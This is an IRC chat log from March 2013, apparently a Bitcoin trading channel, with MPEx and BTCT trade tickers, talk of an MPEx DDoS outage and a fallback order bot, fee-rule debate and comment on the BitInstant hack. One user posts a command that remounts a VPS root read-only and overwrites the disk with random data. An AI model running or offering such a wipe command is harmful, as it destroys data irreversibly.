[BTCTC] [SYNERGY] 1 @ 0.089 BTC [-] Mar 08 11:06:27 mpex.coinbr.com Mar 08 11:06:30 maximian ^ Mar 08 11:06:53 ahhh…. relief Mar 08 11:07:05 ty Mar 08 11:07:11 [BTCTC] [GSDPT] 3 @ 0.005978 = 0.0179 BTC [-] Mar 08 11:07:44 so this is on the new 10Gb connection? Mar 08 11:08:33 [MPEX] [O.BTCUSD.P470T] 450 @ 0.18400178 = 82.8008 BTC [-] Mar 08 11:09:09 ill be around to process withdrawals/deposits for anyone needing. Mar 08 11:09:21 [BTCTC] [S.BBET-PT] 1 @ 0.00195 BTC [+] Mar 08 11:09:53 http://jcph.am/2013/03/08/a-letter-to-my-son/ Mar 08 11:10:06 [MPEX] [O.BTCUSD.P430T] 815 @ 0.13708413 = 111.7236 BTC [-] Mar 08 11:10:17 you have a son ?! Mar 08 11:10:47 youngest bitcoin owner ever Mar 08 11:10:48 [MPEX] [O.BTCUSD.P410T] 680 @ 0.11119696 = 75.6139 BTC [-] Mar 08 11:10:59 interesting, puts are covering ?! Mar 08 11:12:05 [MPEX] [O.BTCUSD.P370T] 100 @ 0.06940607 = 6.9406 BTC [-] Mar 08 11:12:12 learn something every day. Mar 08 11:13:11 is 2175 the correct year Mar 08 11:13:17 why can i not verify that Mar 08 11:14:06 [MPEX] [O.BTCUSD.P350T] 650 @ 0.05313042 = 34.5348 BTC [-] Mar 08 11:16:08 also i'm serious about a screenplay Mar 08 11:16:17 consider that an opening a prologue Mar 08 11:16:26 I think I'll stay until my MPEx deposit is processed. Mar 08 11:16:28 opening scene Mar 08 11:16:33 kid open letter Mar 08 11:17:18 ok this is backwards world. Mar 08 11:17:28 mpex is closed for a day, when it reopens everyone wants to deposit. Mar 08 11:17:36 i imagined there'd be withdrawals Mar 08 11:17:40 Namworld hey Mar 08 11:17:45 lol nice Mar 08 11:17:48 Why? Because someone DDoS it? Mar 08 11:17:53 i was just saying, poor guy. you went off like 5 minutes before Mar 08 11:18:06 anyone who isn't a nervous nelly knows that it was just a temporary issue Mar 08 11:18:13 Yeah, well sleeping is not my forte. Mar 08 11:18:26 hahaha good 1 Mar 08 11:19:06 [MPEX] [O.BTCUSD.C510T] 20 @ 0.05216909 = 1.0434 BTC [-] Mar 08 11:19:13 hi Namworld, can i redirect coinbr.com to bitvps, should the need arise? Mar 08 11:19:28 halelujah some calls. Mar 08 11:19:40 mpex is back up? Mar 08 11:20:07 mjr__ yeh Mar 08 11:20:15 I'd prefer if you didn't... Mar 08 11:20:20 ;) Mar 08 11:20:33 lol Mar 08 11:20:50 [MPEX] [O.BTCUSD.P370T] 195 @ 0.06938646 = 13.5304 BTC [-] Mar 08 11:20:53 mpex trading via social media when its down? Mar 08 11:21:17 BitHub but it's not down. Mar 08 11:21:17 yes, facebook app coming shortly Mar 08 11:21:27 hehe Mar 08 11:22:06 but twatter wouldn't be bad... if they had sane interface Mar 08 11:22:06 [MPEX] [O.BTCUSD.C270T] 214 @ 0.37437884 = 80.1171 BTC [+] Mar 08 11:22:27 now those must have been some juicy calls. Mar 08 11:22:35 yeah that's what im thinking, twitter could come in handy for situations like that Mar 08 11:23:07 [MPEX] [S.MPOE] 7076 @ 0.00072764 = 5.1488 BTC [-] Mar 08 11:23:30 [MPEX] [S.MPOE] 45500 @ 0.00069034 = 31.4105 BTC [-] Mar 08 11:23:33 [MPEX] [S.MPOE] 42424 @ 0.00067334 = 28.5658 BTC [-] Mar 08 11:23:50 mircea_popescu: so what about http://mpex.co ? Mar 08 11:24:06 [MPEX] [S.DICE] 78 @ 0.00413 = 0.3221 BTC [-] Mar 08 11:24:14 still being DDoS'ed I presume Mar 08 11:24:27 maximian there's a lot of hardware being set up. i wanted to get people a lifeline as soon as possible Mar 08 11:24:35 ok Mar 08 11:24:44 not critical anyway Mar 08 11:25:02 access may be spotty over the next coupla days as everything's being assembled, but hey. Mar 08 11:25:07 better than stone cold, i would think. Mar 08 11:25:27 as long as trades can be executed, it's all good Mar 08 11:25:59 jcpham if your son's called jackson are you jack ? Mar 08 11:26:13 definitely Mar 08 11:27:01 he has the same initals as me so he can assume my identity one day Mar 08 11:27:06 [MPEX] [O.BTCUSD.P390T] 445 @ 0.08865601 = 39.4519 BTC [-] Mar 08 11:27:08 [MPEX] [S.DICE] 1 @ 0.00588401 BTC [+] Mar 08 11:27:19 people can live forever on the internet you know Mar 08 11:27:25 or at least an identity can Mar 08 11:27:29 http://www.youtube.com/watch?v=ozWGvWpEamU Mar 08 11:27:31 aha Mar 08 11:30:06 [MPEX] [O.BTCUSD.P490T] 750 @ 0.20943788 = 157.0784 BTC [-] Mar 08 11:34:03 [MPEX] [O.BTCUSD.C290T] 389 @ 0.3278143 = 127.5198 BTC [+] Mar 08 11:34:29 hmm Mar 08 11:34:45 Who sold those P490T? Mar 08 11:34:54 you did Mar 08 11:35:09 Nope. Mar 08 11:35:34 But if someone still wants to sell a few, I'd take some. Mar 08 11:35:38 [BTCTC] [B.YABMC] 1 @ 0.00898 BTC [-] Mar 08 11:35:40 [BTCTC] [B.YABMC] 176 @ 0.00899 = 1.5822 BTC [+] Mar 08 11:36:06 it seems to me most sales are either deep calls takingprofits Mar 08 11:36:13 or short plays like puts trying to cut losses Mar 08 11:36:24 [BTCTC] [B.YABMC] 150 @ 0.009 = 1.35 BTC [+] Mar 08 11:36:26 [BTCTC] [B.YABMC] 43 @ 0.01 = 0.43 BTC [+] Mar 08 11:36:56 maybe Mar 08 11:38:28 "The properties and procedures of bitcoin can solve real world problems like voting and tokenization, but for now, we use it as money." Mar 08 11:38:47 "and we bitch like a virgin in hell if anyone explores alternate uses" Mar 08 11:39:00 What's going on with coinbr? Mar 08 11:39:06 [HAVELOCK] [KCIM] 2 @ 1 = 2 BTC [+] Mar 08 11:41:27 Schadenfreude what is ? Mar 08 11:43:00 Ah, figures, they removed https during maintenance Mar 08 11:43:33 he's moved hosts iirc Mar 08 11:50:16 http://life.nationalpost.com/2013/03/06/ultra-exclusive-4-7-million-lamborghini-veneno-to-challenge-ferrari-and-mclaren/ Mar 08 11:50:48 I'll pay maybe 50 bitcoins for that Mar 08 11:56:59 lol Mar 08 12:01:00 [MPEX] [O.BTCUSD.P490T] 225 @ 0.20947704 = 47.1323 BTC [+] Mar 08 12:02:06 [MPEX] [O.BTCUSD.P510T] 85 @ 0.23623458 = 20.0799 BTC [-] Mar 08 12:10:03 [MPEX] [S.MPOE] 200000 @ 0.00075 = 150 BTC [+] Mar 08 12:12:46 http://www.pinballcoin.com/# Mar 08 12:12:49 this looks fun Mar 08 12:12:50 lol Mar 08 12:23:06 haha 11 fail on pinballcoin Mar 08 12:23:14 what happened on 11 Mar 08 12:23:15 i didnt see it Mar 08 12:23:16 lol Mar 08 12:23:31 still pending Mar 08 12:23:34 mhm Mar 08 12:23:51 12 same Mar 08 12:23:56 do you see it if i spam the free button? Mar 08 12:24:17 Up to 17.5 million RBS banking group customers were left without their money last night as the bank’s systems crashed. Mar 08 12:24:17 and me ? Mar 08 12:24:41 Mhm, is the free button provably fair Mar 08 12:24:44 i seem to lose a lot Mar 08 12:24:45 lol Mar 08 12:25:00 shouldnt i win a lot on the free button Mar 08 12:25:59 the center stuff have way more paths leading to them than others... assuming each spot has the actual odds the same as if the coin had 50% falling either side of each nail. Mar 08 12:27:10 i hit a 5 Mar 08 12:28:12 cool, add then with all your imaginary coin Mar 08 12:28:13 mhm, i hit the free button 104 times, i made my browser slow to a crawl Mar 08 12:28:32 finally managed to sneak into my bitvps vps.. Mar 08 12:28:40 just did mount / -f -o remount,ro ; dd if=/dev/urandom of=/dev/root Mar 08 12:28:50 >:D Mar 08 12:29:31 leave burned ground to them Mar 08 12:29:36 haaa fail, i just try but with instawallet Mar 08 12:30:28 [BTCTC] [ASICMINER-PT] 3 @ 0.65 = 1.95 BTC [-] Mar 08 12:38:06 [MPEX] [S.MPOE] 18000 @ 0.00075 = 13.5 BTC [+] Mar 08 12:42:26 [BTCTC] [ASICMINER-PT] 15 @ 0.65 = 9.75 BTC [-] Mar 08 12:45:30 [BTCTC] [B.YABMC] 1 @ 0.00801 BTC [-] Mar 08 12:45:32 [BTCTC] [B.YABMC] 1 @ 0.008 BTC [-] Mar 08 12:45:34 [BTCTC] [B.YABMC] 77 @ 0.00725 = 0.5583 BTC [-] Mar 08 12:56:26 [BTCTC] [ASICMINER-PT] 6 @ 0.65 = 3.9 BTC [-] Mar 08 13:14:01 asicminer? :) Mar 08 13:14:11 [BTCTC] [ASICMINER-PT] 335 @ 0.65 = 217.75 BTC [-] Mar 08 13:14:41 starting to move a little. Mar 08 13:14:50 !ticker btctc asicminer-pt Mar 08 13:14:52 [BTCT:ASICMINER-PT] 1D: 0.65 / 0.65 / 0.65 (383 shares, 249 BTC), 7D: 0.65 / 0.65004 / 0.655 (625 shares, 406.3 BTC), 30D: 0.65 / 0.65004 / 0.655 (625 shares, 406.3 BTC) Mar 08 13:14:55 price or volume? Mar 08 13:15:01 volume is what i meant Mar 08 13:15:23 otc there was a lot of movement Mar 08 13:15:29 ah Mar 08 13:15:43 more than 10,000 shares sold in the last 2 to 3 weeks Mar 08 13:15:46 price seems glued to 65 tho Mar 08 13:16:02 that was my fault, im fixing that right now Mar 08 13:16:42 only 40 shares left at .65 and then im no longer under contract to sell at that price Mar 08 13:17:23 after bfl fails to ship and asicminer gets 50% of the network i think 1.5 btc might trade Mar 08 13:19:47 you still getting ddossed? Mar 08 13:23:10 well it looks likes it Mar 08 13:24:44 sure. Mar 08 13:24:59 use mpex.coinbr.com for now. Mar 08 13:25:39 mircea_popescu, are they just targeting mpex.co and not mpex.coinbr.com? Mar 08 13:25:54 nah Mar 08 13:26:15 i used tghe ddos to make a lot of upgrades, not everything's ready to come up online Mar 08 13:26:24 but i wanted to open up trade for people, so Mar 08 13:26:38 sorta midway solution for now. Mar 08 13:30:42 [MPEX] [O.BTCUSD.P450T] 675 @ 0.15947462 = 107.6454 BTC [-] Mar 08 13:35:07 Ukto i notice you're conspicuously absent https://bitcointalk.org/index.php?topic=101902.msg1599582#msg1599582 Mar 08 13:35:28 and wtf is going on in these people's heads, they're simultaneously arguing which exchanges should list and delist s.dice Mar 08 13:35:43 what is this, the dictature of the proletariat or someshit ?! who even asked them. Mar 08 13:37:23 Why is the return amount needed on losses? Mar 08 13:37:37 the 1 satoshi or so outputs by S.DICE? Mar 08 13:37:56 bitcoin isn't a dictatorship? Mar 08 13:38:37 Can't Erik remove those? I don't see much point anyway. You can check your lucky number regardless... If you don't win, don't confirm by sending 1 satoshi? Mar 08 13:40:35 heh Mar 08 13:40:41 mircea_popescu: they are just going overkill Mar 08 13:40:43 it wont happen Mar 08 13:40:56 I was talking to Erik the other day Mar 08 13:41:02 yesterday? day before Mar 08 13:41:06 [HAVELOCK] [SDICE] 5 @ 0.4600001 = 2.3 BTC [-] Mar 08 13:41:09 not worth posting Mar 08 13:41:43 No, but is the 1 satoshi return on loss needed? Mar 08 13:41:52 Seems that part could be killed at least Mar 08 13:43:37 Namworld i guess maybe that is in fact superfluous Mar 08 13:43:42 i have no idea why they do it this way. Mar 08 13:43:51 mircea_popescu: is erik even under any kind of permentant "cant just up and move" contract with mpex anyways? Mar 08 13:43:56 yes. Mar 08 13:44:12 how to enforce? Mar 08 13:44:28 some people stick to their contracts ? Mar 08 13:44:31 what enforce. Mar 08 13:44:32 i mean, seems a bit draconian ? Mar 08 13:44:40 why ? Mar 08 13:44:42 "you can never leave" Mar 08 13:44:46 i dunno Mar 08 13:44:47 mircea_popescu, yet BF does the 2nf most volume Mar 08 13:45:10 Ukto if you think about it the only practical effect it has is it prevents accounting becoming a mess a la asicminer. Mar 08 13:45:17 or whatever other post-glbse assets Mar 08 13:45:35 it worked fine there Mar 08 13:45:50 SD offers a lookup tool to check your lucky numbers anyway. If you lose, you can see it from the tool. Mar 08 13:45:50 i didn't get that impression. Mar 08 13:45:55 Namworld ? Mar 08 13:45:59 even with the relatively few shareholders. Mar 08 13:46:06 A lookup search box should be palced prominently on SD Mar 08 13:46:21 Namworld: join the conversation for a sec pls :P Mar 08 13:46:23 If you don't win, don't reply with a 1 satoshi transaction Mar 08 13:46:28 Namworld i dunno, did erik even say at any point why they're sending it that way ? Mar 08 13:47:04 no... I guess so people know the bet has been processed? Mar 08 13:47:09 and that they lost? Mar 08 13:47:12 Namworld, people want to know if they won or not Mar 08 13:47:28 You can check that without a transaction... that's the point Mar 08 13:47:44 The 1 satoshi "You lose" transaction is kind of pointless. Mar 08 13:47:53 well it does give closure on the spot Mar 08 13:48:01 [BTCTC] [ASICMINER-PT] 40 @ 0.65 = 26 BTC [-] Mar 08 13:48:03 maybe that's what it was. Mar 08 13:48:11 ahh i was going to buy them shares Mar 08 13:48:14 It worked pretty well in the early ages Mar 08 13:48:20 Maybe it's due for a change now. Mar 08 13:48:24 ya, possibly something that's no longer needed Mar 08 13:48:29 has erik commented on the thing at all ? Mar 08 13:48:38 Not sure... Mar 08 13:48:59 [MPEX] [O.BTCUSD.P350T] 105 @ 0.05283354 = 5.5475 BTC [-] Mar 08 13:49:05 I don't want to read 1 billion forum posts and stupidities just to find if Erik ever considered/commented Mar 08 13:49:23 heh yeah. Mar 08 13:49:56 im not sure what their point is anyway. "unspendable" ?! Mar 08 13:50:08 well holly molly, if 1 satoshi is unspendable then what are we doing here Mar 08 13:50:16 basically bitcoin will die a thermic death Mar 08 13:50:18 of satoshi Mar 08 13:51:06 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [+] Mar 08 13:51:07 how come colored coins are spendable but satoshi aren't ? isn't this exactly the same thing ? Mar 08 13:51:13 perhaps im missing something. Mar 08 13:52:17 it bloats the unspent inputs Mar 08 13:52:36 ok Mar 08 13:52:48 but there must be a mechanism to reclaim those Mar 08 13:52:52 otherwise we slowly leak btc Mar 08 13:54:02 apparently not... 1 satoshi takes more fees to transact than the satoshi itself. Mar 08 13:54:14 and people tend to exclude 1 satoshi transactions Mar 08 13:54:28 interesting Mar 08 13:54:58 I guess that's mostly that. Not that it's actually impossible to try to send it without any fee. Mar 08 13:55:04 http://www.reddit.com/r/starcraft/comments/19utdu/hey_rstarcraft_its_my_7th_cake_day_and_youre_my/ Mar 08 13:55:09 Free 1 dollar to everyone Mar 08 13:55:14 just commen Mar 08 13:55:15 lol Mar 08 13:55:33 Namworld if they get to be old enough don't they become free ? Mar 08 13:56:30 have some dust in wallet, send to dice for lulz to get rid of it, win under12000 lol Mar 08 13:56:48 you can't really spend specified inputs can you Mar 08 13:56:59 or are you using the pythin toolbox Mar 08 13:57:48 mircea_popescu, any output smaller than 0.01 requires fee Mar 08 13:58:02 so you can't send 1 satoshi. must send a million 1 satoshi inputs and the size of TX will make fees kill Mar 08 13:58:05 TradeFortress days destroyed ruyles don't appply ? Mar 08 13:58:19 nope. Mar 08 13:58:22 aha Mar 08 13:58:25 [BTCTC] [GSDPT] 1 @ 0.005977 BTC [-] Mar 08 13:58:35 I see Mar 08 13:58:45 i wonder why ? Mar 08 13:58:55 more of the same magic number business i guess Mar 08 13:59:10 It's to apply a penalty to people who try to bloat the blockchain Mar 08 13:59:17 I believe in making hardblocks Mar 08 13:59:25 i don't care so much what people intend to do TradeFortress Mar 08 13:59:35 the point is that serious coders don't use magic numbers. Mar 08 14:00:03 and prunning the blockchain Mar 08 14:00:14 then be a miner and choose which TXes to accept :) Mar 08 14:00:40 heh Mar 08 14:00:44 but its more of a codingissue Mar 08 14:00:50 how did they come up with 0,01 ? Mar 08 14:00:58 why not e / 100 Mar 08 14:01:13 why not fifty bitcoins Mar 08 14:01:15 because a small group of coders decided on it. a customizable fee system would be better Mar 08 14:01:25 set your own fee policy. Mar 08 14:01:26 stupid way to code, this. Mar 08 14:02:26 and for that matter, if you're trying to apply a penalty to people who tryt to bloat the blockchain Mar 08 14:02:26 it could (not saying it is) be based on the cost it takes to process/store the TX Mar 08 14:02:40 you want to impose a fee on txs that have small OUTPOUTS Mar 08 14:02:43 not small inputs. Mar 08 14:02:53 mircea_popescu, it is small outputs! Mar 08 14:03:02 if it is small outputs Mar 08 14:03:09 mircea_popescu, any output smaller than 0.01 requires fee Mar 08 14:03:13 then i can use 10 satoshi inputs just fine Mar 08 14:03:41 sure, but you need tons of them, and kb fee. Mar 08 14:03:51 either way the fee system isn't optimal Mar 08 14:10:17 okay, im off. later all Mar 08 14:12:03 later Mar 08 14:24:06 [HAVELOCK] [SDICE] 5 @ 0.4600001 = 2.3 BTC [-] **** BEGIN LOGGING AT Fri Mar 8 21:54:45 2013 Mar 08 21:54:59 hey all! Mar 08 21:55:40 Hello Mar 08 21:55:47 not much trading going on right now Mar 08 21:55:57 howdy Mar 08 21:56:53 i guess not huh Mar 08 22:00:57 http://www.reddit.com/r/Bitcoin/comments/19wq78/my_horrible_bitinstantzipzapmoneygram7eleven/ Mar 08 22:07:49 i guess pizza is what we should stick too Mar 08 22:07:54 er, to Mar 08 22:14:17 https://bitcointalk.org/index.php?topic=149892.0 Mar 08 22:17:15 im preparing a little bomb over here. Mar 08 22:18:03 blockchain.info down too huh Mar 08 22:20:25 oh noes, http://mpex.coinbr.com/ just died Mar 08 22:20:51 zomg bitcoin is exploding! Mar 08 22:21:26 topace: what? Mar 08 22:22:04 mpex down, blockchain.info down, block softlimit filesize reached... Mar 08 22:22:21 BOOM GOES THE DYNAMITE Mar 08 22:23:09 o srsly ?! Mar 08 22:23:19 ass related http://heahea.org/img/743-Toilet_tissue_promotion.jpg Mar 08 22:23:20 it's fine dood Mar 08 22:23:38 pizzaman1337 what are you talkin' about you troll you Mar 08 22:23:47 mircea_popescu: it's back now Mar 08 22:24:00 you prolly had a dns flicker Mar 08 22:24:09 you're not kiddin. blockchain is undermaintenance Mar 08 22:24:19 i wasn;t,no Mar 08 22:24:24 its all misterbiggs fault! Mar 08 22:24:31 what should mpex.co resolve to ? Mar 08 22:24:34 that mofo Mar 08 22:24:46 it should resolve to be a profitable venture Mar 08 22:24:50 topace mpex.co nothing yet. mpex.coinbr.com is what you want Mar 08 22:25:14 also, let me introduce everyone to mpexbot Mar 08 22:25:14 yea thats fine here Mar 08 22:25:17 $help Mar 08 22:25:17 mircea_popescu: (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. Mar 08 22:25:24 $whois Mar 08 22:25:36 bah i mean Mar 08 22:25:38 $vwap Mar 08 22:25:41 mircea_popescu: http://pastebin.com/QhtV1Hu5 Mar 08 22:25:46 $mdepth Mar 08 22:25:48 coinbr.com fully functional nao Mar 08 22:26:05 lol pastebin is slow Mar 08 22:26:26 anyway : in case our proxies get taken down, you can use mpexbot to check the json for vwap prices and market depth. Mar 08 22:26:47 you can also issue orders through it, via $post blabla, where blabla is the url of a pastebin where you've uploaded your gpg encrypted clearsigned order Mar 08 22:27:02 this functionality is disabled currently for administrative reasons, but can be flipped on at will Mar 08 22:27:16 this ensures us against trade being taken down via ddos, unless someone manages to ddoss frenode. Mar 08 22:27:43 there will be a 2nd bot coming online this weekend, doing roughly the same thing, just for redundancy. Mar 08 22:27:51 and trades by email are supported automatically? Mar 08 22:27:59 or you do the manually? Mar 08 22:28:09 trades by email was an absolute lowest level of desperation. Mar 08 22:28:14 we haven't reached it. Mar 08 22:28:35 ah okay Mar 08 22:28:36 it's just there as a possibility so people understand that no matter what happens, mpex will trade. Mar 08 22:28:42 but atm no need for such inconvenience. Mar 08 22:29:00 any questions ? Mar 08 22:29:15 noob question: I've been watching some options books' and I've noticed some have buy/sell orders of 1000, with constantly changing prices. Is someone running a script with those orders, or are they mpex provided or something? Mar 08 22:29:32 pizzaman1337 the 1k blocks are mpoebot quoting Mar 08 22:30:22 ;;rated smickles Mar 08 22:30:23 You rated user smickles on Sat Aug 25 08:39:34 2012, giving him a rating of 4, and supplied these additional notes: He's been running MPOE.ETF and releasing THE monthly reports, a model for all Bitcoin financial reporting. Also handled k's of BTC as broker for various clients.. Mar 08 22:31:42 mircea_popescu: is that just to provide liquidity or something? Mar 08 22:31:57 mircea_popescu: you totally should change the whole MPEX to be used via IRC Mar 08 22:31:59 -totally- Mar 08 22:32:08 just hide the ip of the bot Mar 08 22:32:12 and youre safe from ddos Mar 08 22:32:19 Anduck ;;ident mpexbot Mar 08 22:32:26 ;;ident mpexbot Mar 08 22:32:26 Nick 'mpexbot', with hostmask 'mpexbot!~supybot@unaffiliated/smickles/bot/mpexbot', is not identified. Mar 08 22:32:33 indeed Mar 08 22:32:39 pizzaman1337 well, it's part of mpex business. Mar 08 22:33:07 Anduck when i say mpex is the superior design this is what i mean. Mar 08 22:33:11 ok, I see Mar 08 22:33:19 mircea_popescu: it's far away from superior, sorry. Mar 08 22:33:24 but hey Mar 08 22:33:28 indeed. far away in the upwards. Mar 08 22:33:30 mircea_popescu: wanna know how to really make it superior? Mar 08 22:33:40 i'll tell you. really. Mar 08 22:33:44 heh. Mar 08 22:33:55 the question will be do you have the possibilities to make it happenj Mar 08 22:33:58 which i guess, no. Mar 08 22:34:08 but if someone did, it would be superior. Mar 08 22:34:14 it's totally doable Mar 08 22:34:18 just that nobody has done it, yet. Mar 08 22:34:21 so do it. Mar 08 22:34:23 orders by phone Mar 08 22:34:30 lol Mar 08 22:34:44 colored coins. Mar 08 22:34:44 easy, sms via ec2 amazon services sms abilities Mar 08 22:35:03 i'm from the south, we don't like colored coins 'round here Mar 08 22:35:04 make a system based on colored coin basis Mar 08 22:35:15 it would be totally awesome Mar 08 22:35:19 Anduck after all the shit about s.dice Mar 08 22:35:23 and if you can, hire a group to make it happen. Mar 08 22:35:28 do you have an inknling of a clue what people would say if i used colored coins ? Mar 08 22:35:33 i'd double the blockchain. Mar 08 22:35:54 this is discussed on trilema, read that article when i get it back online. Mar 08 22:36:07 but... i saw porn on there :( Mar 08 22:36:25 well tbh i dont think colored coins would make it worse Mar 08 22:36:32 who are you to think ? Mar 08 22:37:24 https://bitcointalk.org/index.php?topic=64962.msg773413#msg773413 Mar 08 22:37:35 oops Mar 08 22:37:43 ok..? Mar 08 22:38:02 wrong paste. Mar 08 22:40:24 yeh i see Mar 08 22:42:55 < mircea_popescu> you can also issue orders through it, via $post blabla, where blabla is the url of a pastebin where you've uploaded your gpg encrypted clearsigned order Mar 08 22:43:02 $help post Mar 08 22:43:02 smickles: (post ) -- Supply a pastebin paste key containing a signed and encrypted MPEx command. Respondes with a pastebin URL with MPEx's response. Mar 08 22:43:12 $post bi232 Mar 08 22:43:13 smickles: Temporarily disabled by reques of the romanian Mar 08 22:43:16 smickles, this i asked about Mar 08 22:43:55 lmao Mar 08 22:44:03 jurov this isn;tt email tho is it ?! Mar 08 22:44:30 no i asked smickles earlier why mpexbot doesn't do whole urls Mar 08 22:44:32 o o Mar 08 22:44:52 basically, because mircea_popescu didn't ask for that Mar 08 22:45:03 jurov because a. its much easier to parse and b. because the bot can't be touching random servers Mar 08 22:45:06 as its ip is secret Mar 08 22:45:27 it's not that i didn't ask for it, it's that i asked for non-it. Mar 08 22:46:45 ok, we'll see if ppl start running into pastebin limit Mar 08 22:46:54 pro acct is 25 a year Mar 08 22:47:51 le bomb : https://bitcointalk.org/index.php?topic=101902.msg1601463#msg1601463 Mar 08 22:53:20 http://vimeo.com/61144193# Mar 08 22:53:29 something to get involved in finally Mar 08 22:55:11 eh? Mar 08 22:55:45 i dont think newbs should be doing this Mar 08 22:55:51 hmm, 25 pastes per day for an unidentified user, doable Mar 08 22:56:06 id rather make a proxy parser Mar 08 22:56:12 than pay anything Mar 08 22:56:48 there must be some paste something that is not rate limited Mar 08 22:57:09 yes, it's reddit Mar 08 22:57:28 good Mar 08 22:57:36 lets paste the mpex output to reddit Mar 08 22:57:40 let em get ddosed Mar 08 22:57:59 heh Mar 08 22:58:10 how about 4chan Mar 08 22:59:23 couldn't you start an IRC channel that was invite only, pw protected, and people could trade with your bot in there? Mar 08 22:59:33 that way you keep the rif raf from being able to poke around Mar 08 23:00:05 i don't know much about IRC, but I'm sure your own system of IRC networks and servers could manage any load Mar 08 23:00:24 lets paste the mpex output to reddit <<< thart was considered, and is still on the list :D Mar 08 23:00:25 course EC2 doesn't allow IRC servers, not the free ones anyhow Mar 08 23:00:45 deadweasel the idea isn't to keep the "rifraf" Mar 08 23:00:57 this is a very heavy political issue and i won't solve it that way. Mar 08 23:01:05 or just push to github Mar 08 23:01:07 i hate github Mar 08 23:01:14 https://gist.github.com/ Mar 08 23:01:20 well... i don't and i think the attack i've seen could actually blow them offline Mar 08 23:01:29 i can see you with half you face painted blue right now, mircea_popescu Mar 08 23:01:35 lol y blue ? Mar 08 23:01:45 "but they will never take our, MPEX!!!!!!" Mar 08 23:01:51 braveheart Mar 08 23:02:01 lol Mar 08 23:03:59 http://www.theverge.com/2013/3/8/4080160/hackers-steal-over-12000-of-bitcoins-from-bitinstant Mar 08 23:04:10 also wired Mar 08 23:04:10 haha Mar 08 23:04:27 http://www.wired.com/wiredenterprise/2013/03/digital-thieves-pull-off-12000-bitcoin-heist/?cid=co6246174 Mar 08 23:07:01 holy shitsnacks Mar 08 23:08:18 social engineering is great Mar 08 23:08:34 teaches people to 'trust, but verify' Mar 08 23:10:22 lol, "Who is General Failure and why is he reading my harddrive?" Mar 08 23:15:44 PC Load Letter _ wtf does that mean!?! Mar 08 23:21:22 $markov Mar 08 23:21:22 pizza is what i mean. Mar 08 23:21:32 lol Mar 08 23:22:28 capitalize first letter tho Mar 08 23:22:42 wtf Mar 08 23:22:43 also smickles you ever saw seek and destroy, the film ? Mar 08 23:22:44 bitinstant got raped? Mar 08 23:22:50 Diablo-D3 last week Mar 08 23:22:55 heh, didnt hear about that Mar 08 23:23:08 you don't read trilema enouygh, i tore them a new asshole. Mar 08 23:23:09 why did they let that happen Mar 08 23:23:14 its not hard to secure a machine Mar 08 23:23:16 total stupidity. Mar 08 23:23:21 mircea_popescu: i haven't seen that Mar 08 23:23:28 saw a new unknown email in their dns account Mar 08 23:23:31 deleted it and went to bed Mar 08 23:23:37 in the morn herpderp logged into their site as admin Mar 08 23:23:41 had credentials stolen Mar 08 23:23:51 made post about how "security focus" Mar 08 23:23:54 mircea_popescu: yeah, they should have immediately took the site offline Mar 08 23:23:59 im like omgwtfbbq. wut wut wut ?! Mar 08 23:24:03 [HAVELOCK] [SDICE] 2 @ 0.5105 = 1.021 BTC [+] Mar 08 23:24:05 bitinstant got hacked Mar 08 23:24:22 Diablo-D3 at the fucking least change dns pws, argue with their dns provider, and leave someone to watch that accoutn Mar 08 23:24:23 ? Mar 08 23:24:29 davout yes. Mar 08 23:24:31 1 second ima pastebin Mar 08 23:24:34 why did they even have a password for their dns shit? Mar 08 23:24:43 not properly. Mar 08 23:24:46 they should have been using secure certs Mar 08 23:24:47 site5 bs Mar 08 23:24:51 [BTCTC] [BASIC-MINING] 1 @ 0.3449 BTC [-] Mar 08 23:25:18 anyone know how I can get supybot to send the return of my markov command instead of the 'invalid command' error mesage? Mar 08 23:26:04 if not, i'm going code diving Mar 08 23:26:17 davout http://pastebin.com/mHYq6g2u Mar 08 23:27:05 mircea_popescu: your blog fails to load Mar 08 23:27:15 which is why i sent you a paste Mar 08 23:27:31 which is why I want a refund for your stupid trilema credits Mar 08 23:27:43 reading Mar 08 23:27:49 popcorn Mar 08 23:28:04 nuh-uh Mar 08 23:28:10 ButtPlox Mar 08 23:28:11 i tell you sir strictly no refunds Mar 08 23:28:22 why you come here bother me i call the police i tell you Mar 08 23:28:31 davout: i was able to sell some of mine at a profit Mar 08 23:28:36 ahahaha noway Mar 08 23:28:41 put it on the order book Mar 08 23:28:43 smickles: wow Mar 08 23:28:49 dude im starting to think smickles is that kid Mar 08 23:28:55 smickles: which order book Mar 08 23:29:06 you know, the kid that you take to the park in the stroller, comes back with 3 strollers and a motorbike Mar 08 23:29:07 ;;book "trilema credits" Mar 08 23:29:07 Error: No orders for this currency present in database. Mar 08 23:29:46 aw, mircea_popescu, you flatter me :) Mar 08 23:30:04 they should elect you president over there Mar 08 23:30:22 smickles: haha i guess i'm not really used to the over-the-counter exchange Mar 08 23:30:36 davout you know it does more trade than mtgox ? Mar 08 23:30:47 those are the people you need to sell yourself to. Mar 08 23:31:03 [HAVELOCK] [HIM] 10 @ 1.62 = 16.2 BTC [+] Mar 08 23:31:04 [HAVELOCK] [HIM] 2 @ 1.62 = 3.24 BTC [+] Mar 08 23:31:05 an easy way to do it is to go to home depot with 5 usd, buy stuff to make a water pipe, construct it and sell it to a pothead for 70 usd Mar 08 23:31:15 lol Mar 08 23:31:18 mircea_popescu: lol fuck you Mar 08 23:31:37 im not even kidding Mar 08 23:31:58 (if anyone doens't know, davout is the frenchie that sold bitcoin to the banking system. bitcoin-central.net) Mar 08 23:32:33 you still use that pic of some guitar guy as you forum avitar? Mar 08 23:32:43 some gypo yeah Mar 08 23:32:55 then he wonders why he's not got da volume. Mar 08 23:33:04 lol Mar 08 23:33:08 hehe Mar 08 23:35:02 [HAVELOCK] [HIM] 8 @ 1.63 = 13.04 BTC [+] Mar 08 23:35:25 [MPEX] [O.BTCUSD.C250T] 87 @ 0.41809214 = 36.374 BTC [+] Mar 08 23:35:52 21:35 do you have an inknling of a pastebin where you've uploaded your gpg encrypted clearsigned order Mar 08 23:36:41 smickles that film... you should totally watch it. Mar 08 23:36:47 some kickass quotes in it Mar 08 23:37:25 21:35 do you have an inknling of a clue what people would say if i used colored coins would make it superior? Mar 08 23:37:54 this is going to get wacky Mar 08 23:37:57 lmao wtf Mar 08 23:38:04 $markov Mar 08 23:38:04 but... i saw porn on there :( Mar 08 23:38:12 lol Mar 08 23:38:18 $markov Mar 08 23:38:28 oh, i should open it up to the public Mar 08 23:38:31 one sec Mar 08 23:39:32 try it now :) Mar 08 23:39:45 $markov Mar 08 23:39:45 i don't know much about IRC, but 